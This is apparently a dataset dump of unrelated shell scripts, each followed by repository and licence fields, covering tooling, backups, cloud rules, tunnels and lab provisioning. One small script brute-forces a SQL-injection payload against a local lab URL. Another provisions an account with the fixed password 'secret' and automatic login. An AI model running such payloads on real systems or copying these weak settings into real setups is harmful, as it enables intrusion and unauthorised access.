fi
get_key () {
echo $1 | xargs | gawk -F. '{
for (i = 1; i <= NF; i++) {
if (i > 1) {
printf ",";
}
printf "\""$i"\"";
}
}'
}
echo_log () {
echo "[$(date +'%Y-%m-%d %H:%M:%S')] $1" >> $log
}
jsonv () {
echo_log "Writing JSON file"
cat /dev/stdin > $json
echo_log "Writing tokens file"
echo -e "$json\n" | gawk -f $awk > $tokens
echo_log "Deriving keys"
keys=()
for path in ${1//,/ }; do
keys+=($(get_key $path))
done
echo_log "Deriving prefix"
prefix=''
if [ "$2" != "" ]; then
prefix=$(get_key $2)","
fi
echo_log "Counting entries"
count=$(cat $tokens | sed 's/^[\["a-z,]*//g' | sed 's/,.*//g' | gawk '/^[0-9]+$/ && !_[$0]++' | gawk -F\t 'BEGIN{max==""} ($1 > max) {max=$1} END{print max}')
echo_log "Writing map file"
row=''
for key in "${keys[@]}"; do
row="$row[$prefix"INDEX",$key]\t"
done
echo -e $row | gawk -F\t -v n="$count" '{for(i=0;i<=n;i++) print}' | gawk -F\t '{gsub("INDEX",NR-1,$0); print $0}' > $map
echo_log "Deriving line format"
format=''
for ((i=1; i<=${#keys[@]}; i++)); do
if [ $i -gt 1 ]; then
format+='","'
fi
format+="a[\$"$i"]"
done
echo_log "Compiling CSV output"
program="'FNR==NR{a[\$1]=\$2; next} {print $format}'"
eval "gawk -F\\\t $program $tokens $map"
echo_log "Done."
echo "=====================" >> $log
}
if [[ "$1" == "-v" || "$1" == "--version" ]]; then
echo "0.2.0"
elif [ "$1" != "" ]; then
jsonv $1 $2
fi
|
CMeza99/TwitterControl
|
jsonv.sh
|
Shell
|
gpl-2.0
| 2,916 |
#!/bin/sh
docker stop omf_grip_run
docker rm omf_grip_run
#docker rmi omf_grip
|
dpinney/omf
|
omf/scratch/GRIP/helper/dockerClean.sh
|
Shell
|
gpl-2.0
| 79 |
#!/bin/bash
>/tmp/commands.list
#for i in {1..11000}; do
for i in {1..7000}; do
echo "http://da-ts03.bond/rewrite_"$i"/16000_BBB_Main_deu_20_16000k-HEVC-4K_track1_dashinit.mp4" >>/tmp/commands.list
done
xargs -a /tmp/commands.list -P $(grep -c ^processor /proc/cpuinfo) -I COMMAND sh -c 'echo "COMMAND"; curl -s -o /dev/null "COMMAND"'
|
jursonovicst/tools
|
dashperf/populate.sh
|
Shell
|
gpl-2.0
| 343 |
#!/bin/bash
# Author: Mike Rodarte
#
# Listen to the log file and respond as necessary.
serverDir='/home/minecraft/minecraft'
logDir="${serverDir}/logs/"
logFile="${logDir}latest.log"
commandName='mcapi'
lastLine=''
# execute the listener while the log file exists
while [ -f $logFile ]; do
last=$(tail -1 $logFile)
# check to see if $commandName exists in $last
if [ "$last" != "$lastLine" ] && [[ "$last" == *"$commandName"* ]]; then
# get whatever follows $commandName
position=$(echo `echo "$last" | grep -aob "$commandName" | grep -oE '^[0-9]+'`)
posCommand=$(( $position + ${#commandName} ))
cmd="${last:$posCommand}"
"${serverDir}/minecraft-server-helper/mcapi" $cmd
# do not keep doing this same command
lastLine="$last"
fi
done
|
mts7/minecraft-server-helper
|
mc-listener.sh
|
Shell
|
gpl-2.0
| 778 |
#!/usr/bin/env bash
QUERY=${1:-"this is a tes for splellchecker"}
PORT=${2:-8888}
INDEX_NAME=${3:-index_getjenny_english_0}
curl -v -H "Authorization: Basic $(echo -n 'test_user:p4ssw0rd' | base64)" \
-H "Content-Type: application/json" -X POST "http://localhost:${PORT}/${INDEX_NAME}/spellcheck/terms" -d "{
\"text\": \"${QUERY}\",
\"prefixLength\": 3,
\"minDocFreq\": 1
}"
|
GetJenny/starchat
|
scripts/api_test/postSpellckeckTerms.sh
|
Shell
|
gpl-2.0
| 386 |
#!/bin/sh
# Contributed by Barry Allard in 2.4.2.3 fork (github.com/steakknife/tripwire)
git clean -dff
git clean -Xff
rm -rf autom4te.cache
|
Tripwire/tripwire-open-source
|
contrib/clean.sh
|
Shell
|
gpl-2.0
| 141 |
#PBS -N otu-cluster
#PBS -m bea
#PBS -M [email protected]
#PBS -W group_list=bhurwitz
#PBS -q standard
#PBS -l select=1:ncpus=2:mem=4Gb
#PBS -l cput=6:0:0
#PBS -l walltime=24:00:00
set -u
source ${PROJECT_DIR}/config.sh
cd $FOR_OUT
${BIN_DIR}/usearch -cluster_otus ${FOR_SORTED} -otus ${FOR_OTU} -uparseout ${FOR_OTU_RESULTS} -otu_radius_pct ${OTU_RADIUS} 2> 05-for_otu_cluster_5.0.log
### Do above steps for the reverse reads
if [[ $PAIRED_END = "true" ]]; then
cd $REV_OUT
REV_BASENAME=$(basename ${REV_SORTED} _derep_sorted.fna)
${BIN_DIR}/usearch -cluster_otus ${REV_SORTED} -otus ${REV_OTU} -uparseout ${REV_OTU_RESULTS} -otu_radius_pct ${OTU_RADIUS} 2> 05-rev_otu_cluster_5.0.log
fi
|
hurwitzlab/amplicon-illumina
|
scripts/workers/05-otu-cluster_exec.sh
|
Shell
|
gpl-2.0
| 708 |
#!/bin/bash -ex
# Make sure the robofile is in the correct location.
cp modules/apigee_m10n/.circleci/RoboFile.php ./
# Update dependencies if necessary.
if [[ ! -f dependencies_updated ]]; then
robo setup:skeleton
robo add:dependencies-from modules/$1/composer.json
robo drupal:version $2
robo configure:m10n-dependencies
robo update:dependencies
robo do:extra $2
fi
# Touch a flag so we know dependencies have been set. Otherwise, there is no
# easy way to know this step needs to be done when running circleci locally since
# it does not support workflows.
touch dependencies_updated
|
apigee/apigee-m10n-drupal
|
.circleci/update-dependencies.sh
|
Shell
|
gpl-2.0
| 602 |
#!/bin/bash
# Purpose: Restores incremental backups of a given directory.
# Author: Ryan McDonald <[email protected]>
#######################################################################
DIR_TO_RESTORE=$1
BKP_DIR=$HOME/bkp #<- where incremental backups exist
#######################################################################
## validate parms:
#######################################################################
function usage {
echo "USAGE:"
echo " $0 relative_dir_to_be_restored"
echo
echo "Note: the dir to restore must resemble files in:"
echo " $BKP_DIR"
exit 1
}
if [[ -z $DIR_TO_RESTORE ]]; then
echo "Missing DIR_TO_RESTORE (the only parm)"
usage
fi
WILDCARD="$BKP_DIR/*$DIR_TO_RESTORE*tgz"
BKP_COUNT=$(ls $WILDCARD 2>/dev/null | wc -l)
if [[ $BKP_COUNT < 1 ]]; then
echo "Couldn't find any bkp files with:"
echo "ls $WILDCARD"
usage
fi
#######################################################################
## setup variables:
#######################################################################
STAMP=$(date +"%Y%m%d.%H%M%S")
RESTORE_DIR=${DIR_TO_RESTORE}_restored_$STAMP
#######################################################################
## create backup:
#######################################################################
mkdir $RESTORE_DIR
cd $RESTORE_DIR
for TGZ in $(ls $WILDCARD); do
tar -z --extract --listed-incremental=/dev/null --file $TGZ
done
cd ..
echo "$DIR_TO_RESTORE has been restored to:"
echo
echo "./$(ls -d $RESTORE_DIR/$DIR_TO_RESTORE)"
echo
|
devops001/standard_scripts
|
restore.sh
|
Shell
|
gpl-2.0
| 1,557 |
#!/bin/bash
################################################################################
#
# Exibe a tabela de informações de montagem
#
# Autor: Luciano Gonçalez
#
################################################################################
# Definições desse arquivo
scriptiname="showmounts"
scriptgroup="futils"
scriptversion="0.5"
scriptdate="2014-0101"
# Definições padrão (automaticas)
lkspref="lks"
scriptalias="${scriptiname}.${lkspref}-${scriptgroup}"
scriptname="${lkspref}-${scriptiname}"
# Mostra erro de array nao suportado
function showerrorarray() {
cat << EOF | expand -t2 >&2
O 'bash' atual não suporta arrays associativos!
EOF
}
# Mostra mensagem de erro de uso
function showerroruse() {
cat << EOF | expand -t2 >&2
Uso: ${scriptname}
Tente '--help' ou '-h' para mais opções.
EOF
}
# Mostra versão do script
function showversion() {
echo "$scriptversion"
}
# Mostra alias do script
function showalias() {
echo "$scriptalias"
}
# Mostra data do script
function showdate() {
echo "$scriptdate"
}
# Mostra grupo do script
function showgroup() {
echo "$scriptgroup"
}
# Mostra nome interno do script
function showiname() {
echo "$scriptiname"
}
# Mostra nome original do script
function showname() {
echo "${scriptname}"
}
# Função que mosta a ajuda
function showhelp() {
cat << EOF | expand -t2 | less -XFe
lks-${scriptiname}.sh [v${scriptversion}] (${scriptgroup})
<alias: ${scriptiname}.lks-${scriptgroup}>
Script para exibir a tabela de informações de montagem
Uso:
lks ${scriptiname}
lks ${scriptiname} --all --sort
lks ${scriptiname} --help
lks ${scriptiname} --version <alias|date|group|iname|name>
lks ${scriptiname} -as
lks ${scriptiname} -h
lks ${scriptiname} -v
Opções:
--all , -a : Exibe todos os pontos de montagem.
Normalmente somente é exibido os de disposítivos físicos;
--sort , -a : Ordena a lista;
--help, -h : Mostra este texto de ajuda;
--version , -v : Mostra a versão do script. Usando opções mostra:
alias : Apelido que pode ser usado para chamar o script;
date : Data de versão;
group : Grupo ao qual o script pertence (depende da sua funcionalidade);
iname : Nome interno do script;
name : Nome original do script;
Escrito por: Luciano Gonçalez
EOF
}
# Funcao principal
function main() {
list=$(
cat /proc/mounts | tr ' ' '\t' | while read -r line ; do
devname=$(echo -e "$line" | cut -f1)
tempname=$(readlink -e "$devname")
if [ -n "$tempname" ] ; then
devname="$tempname"
fi
mountname=$(echo -e "$line" | cut -f2)
fsname=$(echo -e "$line" | cut -f3)
labelname=$(blkid -s LABEL "$devname" | sed 's/.*LABEL="//' | sed 's/"\s*$//')
uuid=$(blkid -s UUID "$devname" | sed 's/.*UUID="//' | sed 's/"\s*$//')
echo -e "${devname}\t${mountname}\t${fsname}\t${uuid}\t${labelname}"
done
)
if ${option[sort]} ; then
if ${option[all]} ; then
echo "$list" | sort | grep -v '^/'
fi
echo "$list" | sort | grep '^/'
else
if ${option[all]} ; then
echo "$list"
else
echo "$list" | grep '^/'
fi
fi
}
# Funcao para checar parametros
function checkparameters() {
# Testa opções exclusivas
if ${option[help]} && ${option[version]} ; then
option[error]="true"
fi
# Executa uma ação
if ${option[error]} ; then
# Mostra mensagem de erro
showerroruse
return 1
elif ${option[help]} ; then
# Mostra texto de ajuda
showhelp
elif ${option[version]} ; then
case "${option[version_type]}" in
alias) showalias ;;
date) showdate ;;
group) showgroup ;;
iname) showiname ;;
name) showname ;;
*) showversion ;;
esac
else
# Se tudo certo chama main
main
fi
}
# Inicio
{ # Pega parametros
if ! declare -A option ; then showerrorarray ; exit ; fi
option=(
[error]="false"
[help]="false"
[version]="false"
[version_type]=""
[all]="false"
[sort]="false"
)
while [ "${option[error]}" = "false" ] && [ $# -gt 0 ] ; do
if [ "${1:0:2}" = "--" ] ; then
case "$1" in
--help) option[help]="true" ;;
--version)
if ${option[version]} ; then
option[error]="true"
else
option[version]="true"
case "$2" in
alias|date|group|iname|name)
option[version_type]="$2"
shift
;;
esac
fi
;;
--all) option[all]="true" ;;
--sort) option[sort]="true" ;;
*) option[error]="true" ;;
esac
elif [ "${1:0:1}" = "-" ] ; then
paramopt="${1:1}"
while [ ${#paramopt} -gt 0 ] ; do
case "${paramopt:0:1}" in
h) option[help]="true" ;;
v)
if ${option[version]} ; then
option[error]="true"
else
option[version]="true"
fi
;;
a) option[all]="true" ;;
s) option[sort]="true" ;;
*) option[error]="true" ; break ;;
esac
paramopt="${paramopt:1}"
done
else
option[error]="true"
fi
shift
done
}
checkparameters
|
LucGoncalez/lkscripts
|
lks-showmounts.sh
|
Shell
|
gpl-2.0
| 4,906 |
# export AWS_ACCESS_KEY="Your-Access-Key"
# export AWS_SECRET_KEY="Your-Secret-Key"
today=`date +"%d-%m-%Y","%T"`
logfile="/awslog/ec2-access.log"
# Grab all Security Groups IDs for DISALLOW action and export the IDs to a text file
sudo aws ec2 describe-security-groups --filters Name=tag:close-allports-time,Values=05-00 Name=tag:bash-profile,Values=wd --query SecurityGroups[].[GroupId] --output text > ~/tmp/disallowall_wd_info.txt 2>&1
# Take list of changing security groups
for group_id in $(cat ~/tmp/disallowall_wd_info.txt)
do
# Change rules in security group
sudo aws ec2 revoke-security-group-ingress --group-id $group_id --protocol all --port all --cidr 0.0.0.0/0
# Put info into log file
echo Attempt $today disallow access to instances with attached group $group_id for all ports >> $logfile
done
|
STARTSPACE/aws-access-to-ec2-by-timetable
|
all/disallow-wd/all-disallow-wd-05.sh
|
Shell
|
gpl-2.0
| 817 |
#!/bin/sh
_REPO='oriaks'
_DIR=`cd "$( dirname "$0" )" && pwd`
docker run -it --rm "${_REPO}/debian:latest"
|
oriaks/docker-debian
|
run.sh
|
Shell
|
gpl-2.0
| 109 |
echo "helo_name=mail.palepurple.co.uk
[email protected]
[email protected]
client_address=81.133.46.190
request=smtpd_access_policy
" | perl -I ../src -w ../src/policyd.pl
|
palepurple/policyd-dnsbl-spf-geoip
|
tests/test-bmc.sh
|
Shell
|
gpl-2.0
| 190 |
#! /bin/bash
function seperator
{
echo "--------------------------------------------------------------------------"
}
function cleanup
{
echo "deleting temporary files..."
rm -f .svnlog .contributors
}
function updatelog
{
cleanup
echo "getting svn log from server... this may take a while"
svn log -q > .svnlog
}
function catlog
{
cat .svnlog | grep '^r[0-9]' | grep -v "trikalio" | sed 's:Loggedoubt:loggedoubt:g'
}
function checkrev
{
if [ ! -f .svnlog ]; then
updatelog
fi
CREV=`svnversion . | sed 's:M::' | sed 's/.*://'`
LREV=`catlog | sed 's:^r::g' | sort -nr | head -n1 | awk '{print $1}'`
if [ "$CREV" -ne "$LREV" ]; then
echo "WARNING: local log is not up to date, use '$0 update' to update it."
fi
}
# create a list of all SVN contributors
function findcontributors
{
if [ ! -f .svnlog ]; then
updatelog
fi
catlog | awk '{print $3}' | sort | uniq > .contributors
}
function showcontributors
{
findcontributors
echo "showing all SVN contributors, sorted alphabetically:"
seperator
cat .contributors
}
# find last commit of a SVN contributor
function findlastcommit
{
catlog | sed 's:^r::g' | grep "$1" | sort -nr | head -n1
}
# find last commit of all SVN contributors
function findlastcommits
{
if [ ! -f .contributors ]; then
findcontributors
fi
while read line; do
findlastcommit $line
done < .contributors
}
# show last activity of all contributors
function showlastactivity
{
echo "showing last activity, sorted by date:"
seperator
findlastcommits | sort -nr | awk -F "|" '{printf "r%s %-20s %s\n", $1, $2, $3}'
}
function findcommitnumber
{
echo `catlog | grep "$1" | wc -l` "$1"
}
function findcommitnumbers
{
if [ ! -f .contributors ]; then
findcontributors
fi
while read line; do
findcommitnumber $line
done < .contributors
}
function showtotalactivity
{
echo "showing activity, sorted by number of commits:"
seperator
findcommitnumbers | sort -nr | awk '{printf "%6d %s\n", $1, $2}'
}
################################################################################
function usage
{
echo "usage: check-activity.sh <option>"
echo "where option is one of:"
echo "update - update local copy of SVN log"
echo "contributors - show alltime SVN contributor list"
echo "lastactivity - show last activity of all contributors"
echo "totalactivity - show number of all commits for all contributors"
echo "cleanup - remove temporary files"
echo "WARNING: The script will not automatically update the local SVN log, to"
echo " do that use the 'update' option manually. This is to save"
echo " (a lot of) time on subsequent runs."
exit
}
################################################################################
case $1 in
update)
updatelog ;;
contributors)
checkrev
showcontributors ;;
lastactivity)
checkrev
showlastactivity ;;
totalactivity)
checkrev
showtotalactivity ;;
cleanup)
cleanup ;;
*)
usage ;;
esac
|
AreaScout/vice-gles2
|
check-activity.sh
|
Shell
|
gpl-2.0
| 3,236 |
#!/bin/bash
CONF_DIR="/etc/lightdm/lightdm.conf.d"
#CONF_DIR="test-dir"
CONF_FILE="60-manual-login.conf"
if [ ! -d $CONF_DIR ];
then
mkdir $CONF_DIR
fi
echo "[SeatDefaults]" >> $CONF_DIR/$CONF_FILE
# Unity Greeter (and some other greeters) don't allow you to enter a username to log in with by default. You can enable this with:
echo "" >> $CONF_DIR/$CONF_FILE
echo "greeter-show-manual-login=true" >> $CONF_DIR/$CONF_FILE
# Unity Greeter (and some other greeters) shows the list of possible user accounts by default.
# If you want to disable this (you have too many users or security concerns) use the following configuration.
# You may also want to explicitly enable manual login with this feature.
echo "" >> $CONF_DIR/$CONF_FILE
#echo "greeter-hide-users=true" >> $CONF_DIR/$CONF_FILE
|
edvapp/autoinstall
|
laus/scriptsForClasses/ZZZARCHIVE/APP/APP1604/440-configLightdmForLDAP.sh
|
Shell
|
gpl-2.0
| 798 |
PATH=/bin:/usr/bin
export PATH
rm -rf t058-dir
mkdir t058-dir
mkdir t058-dir/emacs
mkdir t058-dir/w3-tools
echo "append-path PATH /usr/local" > t058-dir/local
echo "append-path PATH /usr/18.57" > t058-dir/emacs/18.57
echo "append-path PATH /usr/19.25.94" > t058-dir/emacs/19.25.94
echo "append-path PATH /usr/19.25.95" > t058-dir/emacs/19.25.95
echo "append-path PATH /usr/19.26" > t058-dir/emacs/19.26
echo "append-path PATH /usr/19.27" > t058-dir/emacs/19.27
echo "append-path PATH /usr/19.29" > t058-dir/emacs/19.29
echo "append-path PATH /usr/19.30" > t058-dir/emacs/19.30
echo "append-path PATH /usr/19.31" > t058-dir/emacs/19.31
echo "append-path PATH /usr/19.33" > t058-dir/emacs/19.33
echo "append-path PATH /usr/19.34" > t058-dir/emacs/19.34
echo "append-path PATH /usr/20.2" > t058-dir/emacs/20.2
echo "append-path PATH /usr/latest" > t058-dir/emacs/latest
echo "append-path PATH /usr/old" > t058-dir/emacs/old
echo "append-path PATH /usr/test" > t058-dir/emacs/test
echo "append-path PATH /usr/z" > t058-dir/emacs/z
echo "append-path PATH /usr/1.0" > t058-dir/w3-tools/1.0
MODULEPATH=t058-dir
export MODULEPATH
../cmod sh avail
|
yuhangwang/CMod
|
src/source/cmod-1.1/testsuite/t058.sh
|
Shell
|
gpl-2.0
| 1,140 |
#!/bin/sh
# 6rd.sh - IPv6-in-IPv4 tunnel backend
# Copyright (c) 2010-2012 OpenWrt.org
[ -n "$INCLUDE_ONLY" ] || {
. /lib/functions.sh
. /lib/functions/network.sh
. ../netifd-proto.sh
init_proto "$@"
}
tun_error() {
local cfg="$1"; shift;
[ -n "$1" ] && proto_notify_error "$cfg" "$@"
proto_block_restart "$cfg"
}
proto_6rd_setup() {
local cfg="$1"
local iface="$2"
local link="6rd-$cfg"
local mtu ttl ipaddr peeraddr ip6prefix ip6prefixlen ip4prefixlen
json_get_vars mtu ttl ipaddr peeraddr ip6prefix ip6prefixlen ip4prefixlen
[ -z "$ip6prefix" -o -z "$peeraddr" ] && {
tun_error "$cfg" "MISSING_ADDRESS"
return
}
[ -z "$ipaddr" ] && {
local wanif
if ! network_find_wan wanif || ! network_get_ipaddr ipaddr "$wanif"; then
tun_error "$cfg" "NO_WAN_LINK"
return
fi
}
# Determine the relay prefix.
local ip4prefixlen="${ip4prefixlen:-0}"
local ip4prefix=$(ipcalc.sh "$ipaddr/$ip4prefixlen" | grep NETWORK)
ip4prefix="${ip4prefix#NETWORK=}"
# Determine our IPv6 address.
local ip6subnet=$(6rdcalc "$ip6prefix/$ip6prefixlen" "$ipaddr/$ip4prefixlen")
local ip6addr="${ip6subnet%%::*}::1"
proto_init_update "$link" 1
proto_add_ipv6_address "$ip6addr" "$ip6prefixlen"
proto_add_ipv6_route "::" 0 "::$peeraddr"
proto_add_tunnel
json_add_string mode sit
json_add_int mtu "${mtu:-1280}"
json_add_int ttl "${ttl:-64}"
json_add_string local "$ipaddr"
json_add_string 6rd-prefix "$ip6prefix/$ip6prefixlen"
json_add_string 6rd-relay-prefix "$ip4prefix/$ip4prefixlen"
proto_close_tunnel
proto_send_update "$cfg"
}
proto_6rd_teardown() {
local cfg="$1"
}
proto_6rd_init_config() {
no_device=1
available=1
proto_config_add_int "mtu"
proto_config_add_int "ttl"
proto_config_add_string "peeraddr"
proto_config_add_string "ip6prefix"
proto_config_add_string "ip6prefixlen"
proto_config_add_string "ip4prefixlen"
}
[ -n "$INCLUDE_ONLY" ] || {
add_protocol 6rd
}
|
stephank/openwrt
|
package/6rd/files/6rd.sh
|
Shell
|
gpl-2.0
| 1,918 |
#!/bin/bash -x
#
# Generated - do not edit!
#
# Macros
TOP=`pwd`
CND_PLATFORM=ArduinoCustom-Linux-x86
CND_CONF=Debug
CND_DISTDIR=dist
CND_BUILDDIR=build
CND_DLIB_EXT=so
NBTMPDIR=${CND_BUILDDIR}/${CND_CONF}/${CND_PLATFORM}/tmp-packaging
TMPDIRNAME=tmp-packaging
OUTPUT_PATH=${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/timing
OUTPUT_BASENAME=timing
PACKAGE_TOP_DIR=timing/
# Functions
function checkReturnCode
{
rc=$?
if [ $rc != 0 ]
then
exit $rc
fi
}
function makeDirectory
# $1 directory path
# $2 permission (optional)
{
mkdir -p "$1"
checkReturnCode
if [ "$2" != "" ]
then
chmod $2 "$1"
checkReturnCode
fi
}
function copyFileToTmpDir
# $1 from-file path
# $2 to-file path
# $3 permission
{
cp "$1" "$2"
checkReturnCode
if [ "$3" != "" ]
then
chmod $3 "$2"
checkReturnCode
fi
}
# Setup
cd "${TOP}"
mkdir -p ${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package
rm -rf ${NBTMPDIR}
mkdir -p ${NBTMPDIR}
# Copy files and create directories and links
cd "${TOP}"
makeDirectory "${NBTMPDIR}/timing/bin"
copyFileToTmpDir "${OUTPUT_PATH}" "${NBTMPDIR}/${PACKAGE_TOP_DIR}bin/${OUTPUT_BASENAME}" 0755
# Generate tar file
cd "${TOP}"
rm -f ${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package/timing.tar
cd ${NBTMPDIR}
tar -vcf ../../../../${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package/timing.tar *
checkReturnCode
# Cleanup
cd "${TOP}"
rm -rf ${NBTMPDIR}
|
Kaputnik120/AllProjects
|
Timing/nbproject/Package-Debug.bash
|
Shell
|
gpl-2.0
| 1,447 |
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
${DIR}/qt${QT_VERSION}/before_install.sh
|
SebDieBln/QGIS
|
ci/travis/linux/before_install.sh
|
Shell
|
gpl-2.0
| 110 |
################################################################################
#
# This script is to automate installation of Linux Integration Services for
# Microsoft Hyper-V
#
################################################################################
# Determine kernel architecture version
osbit=`uname -m`
# Determine if its PAE kernel
#Selecting appropriate rpm, 64 bit rpm for x86_64 based VM
if [ "$osbit" == "x86_64" ]; then
{
kmodrpm=`ls lis-52/x86_64/kmod-microsoft-hyper-v-*.x86_64.rpm`
msrpm=`ls lis-52/x86_64/microsoft-hyper-v-*.x86_64.rpm`
}
elif [ "$osbit" == "i686" ]; then
PAE=` uname -r | grep PAE`
if [ "$PAE" == "" ]; then
{
kmodrpm=`ls lis-52/x86/kmod-microsoft-hyper-v-4*.i686.rpm`
msrpm=`ls lis-52/x86/microsoft-hyper-v-*.i686.rpm`
}
else
{
kmodrpm=`ls lis-52/x86/kmod-microsoft-hyper-v-PAE-*.i686.rpm`
msrpm=`ls lis-52/x86/microsoft-hyper-v-*.i686.rpm`
}
fi
fi
#Making sure both rpms are present
if [ "$kmodrpm" != "" ] && [ "$msrpm" != "" ]; then
echo "Installing the Linux Integration Services for Microsoft Hyper-V..."
rpm -ivh $kmodrpm
kmodexit=$?
if [ "$kmodexit" == 0 ]; then
rpm -ivh --nodeps $msrpm
msexit=$?
if [ "$msexit" != 0 ]; then
echo "Microsoft-Hyper-V rpm installation failed, Exiting"
exit 1;
else
echo " Linux Integration Services for Hyper-V has been installed. Please reboot your system"
fi
else
echo "Kmod RPM installation failed, Exiting"
exit 1
fi
else
echo "RPM's are missing"
fi
|
alexngmsft/lis-next
|
rpmbuild/LISISO/CentOS52/install.sh
|
Shell
|
gpl-2.0
| 1,782 |
for f in "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "A" "B" "C" "D" "E" "F":
do
for g in "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "A" "B" "C" "D" "E" "F":
do
curl "http://localhost/sqli/6?id=%$f$g'or1=1--"
done
done
|
syakesaba/webhack
|
sqli/utils/bf2.sh
|
Shell
|
gpl-2.0
| 232 |
#!/bin/bash
DATASET=adult
PROPERTY=14
BASEDIR=$(dirname $0)/..
CMD=$BASEDIR/target/universal/stage/bin/jsm-cli
sbt stage 2>&1
echo "--- Encoding of CSV"
$CMD encode -p $PROPERTY data/$DATASET.csv $DATASET.dat
echo "--- Randomized split of dataset"
$CMD split 8:2 $DATASET.dat $DATASET-training.dat $DATASET-verify.dat
echo "--- Produce dataset with hidden value out of verify dataset"
$CMD tau $DATASET-verify.dat $DATASET-tau.dat
echo "--- Generate model"
$CMD generate -m $DATASET-model.dat $DATASET-training.dat
echo "--- Run predictions on file with tau properties"
$CMD predict -m $DATASET-model.dat -o $DATASET-predictions.dat $DATASET-tau.dat
echo "--- Calculate basic stats on predictions"
$CMD stats $DATASET-verify.dat $DATASET-predictions.dat
|
DmitryOlshansky/jsm4s
|
scripts/adult.sh
|
Shell
|
gpl-2.0
| 754 |
#
# Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# @ignore 8028733
# @test @(#)Test6626217.sh
# @bug 6626217
# @summary Loader-constraint table allows arrays instead of only the base-classes
# @run shell Test6626217.sh
#
## some tests require path to find test source dir
if [ "${TESTSRC}" = "" ]
then
TESTSRC=${PWD}
echo "TESTSRC not set. Using "${TESTSRC}" as default"
fi
echo "TESTSRC=${TESTSRC}"
## Adding common setup Variables for running shell tests.
. ${TESTSRC}/../../test_env.sh
JAVA=${TESTJAVA}${FS}bin${FS}java
JAVAC=${COMPILEJAVA}${FS}bin${FS}javac
# Current directory is scratch directory, copy all the test source there
# (for the subsequent moves to work).
${CP} ${TESTSRC}${FS}* ${THIS_DIR}
# A Clean Compile: this line will probably fail within jtreg as have a clean dir:
${RM} -f *.class *.impl many_loader.java
# Make sure that the compilation steps occurs in the future as not to allow fast systems
# to copy and compile bug_21227.java so fast as to make the class and java have the same
# time stamp, which later on would make the compilation step of many_loader.java fail
sleep 2
# Compile all the usual suspects, including the default 'many_loader'
${CP} many_loader1.java.foo many_loader.java
${JAVAC} ${TESTJAVACOPTS} -source 1.4 -target 1.4 -Xlint *.java
# Rename the class files, so the custom loader (and not the system loader) will find it
${MV} from_loader2.class from_loader2.impl2
# Compile the next version of 'many_loader'
${MV} many_loader.class many_loader.impl1
${CP} many_loader2.java.foo many_loader.java
${JAVAC} ${TESTJAVACOPTS} -source 1.4 -target 1.4 -Xlint many_loader.java
# Rename the class file, so the custom loader (and not the system loader) will find it
${MV} many_loader.class many_loader.impl2
${MV} many_loader.impl1 many_loader.class
${RM} many_loader.java
${JAVA} ${TESTVMOPTS} -Xverify -Xint -cp . bug_21227 >test.out 2>&1
grep "loader constraint" test.out
exit $?
|
arbeitspferde/openjdk9-hotspot
|
test/runtime/6626217/Test6626217.sh
|
Shell
|
gpl-2.0
| 2,947 |
# Dpu signals an error on wrong options
# $PROG program
# $EXITCODE exitcode
# $TEST path to this file
cmd $PROG --fjsdkl || $PROG --jjqkl || $PROG -4
test $EXITCODE != 0
#grep -i usage
test $(wc -l) -ge 1 # at least one line of output
|
cesaro/dpu
|
tests/regression/cmdargs/bad-option.test.sh
|
Shell
|
gpl-2.0
| 239 |
#!/bin/bash
if ! rpm -qa | grep deltarpm | grep -v grep >/dev/null
then
yum -y install deltarpm
fi
yum -y update
if ! ( yum grouplist | sed -n '/Installed environment/,/Available environment/p' | grep KDE >/dev/null 2>&1 )
then
yum -y groupinstall "KDE Plasma Workspaces"
yum -y install sharutils
fi
if ! grep student /etc/passwd >/dev/null 2>&1
then
useradd -m student
(sleep 5; echo "secret"; sleep 2; echo "secret") | passwd student
fi
if ! grep AutoLoginEnable /etc/gdm/custom.conf >/dev/null 2>&1
then
echo "[daemon]
AutomaticLoginEnable=true
AutomaticLogin=student
[security]
[xdmcp]
[greeter]
[chooser]
[debug]
" >/etc/gdm/custom.conf
fi
cd /home/student
uudecode $0
tar xvf neueda-linux.tar
mv lab exercise
chown -R student:student exercise
if ! (systemctl get-default | grep graphical.target >/dev/null 2>&1)
then
systemctl set-default graphical.target
init 6
fi
exit 0;
begin 664 neueda-linux.tar
M;&%B+P``````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````#`P-#`W-34`,#`R,38U,P`P,#`W,#`W`#`P,#`P,#`P,#`P
M`#`V-S<W,C(P,#(W`#`P,3$U-S<`-0``````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````!U<W1A<@`P,&5V860`
M````````````````````````````````````8V,S-3DQ````````````````
M```````````````````P,#`P,S4S`#`P,#`V,3<`````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````!L86(O24-H:6YG````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````,#$P,#8T-``P,#(Q-C4S`#`P
M,#<P,#<`,#`P,#`P,#`R,#$`,#4T,#(R,30U-C,`,#`Q,C8T,0`P````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````'5S=&%R`#`P979A9`````````````````````````````````````!C
M8S,U.3$``````````````````````````````````#`P,#`S-3,`,#`P,#8Q
M-P``````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
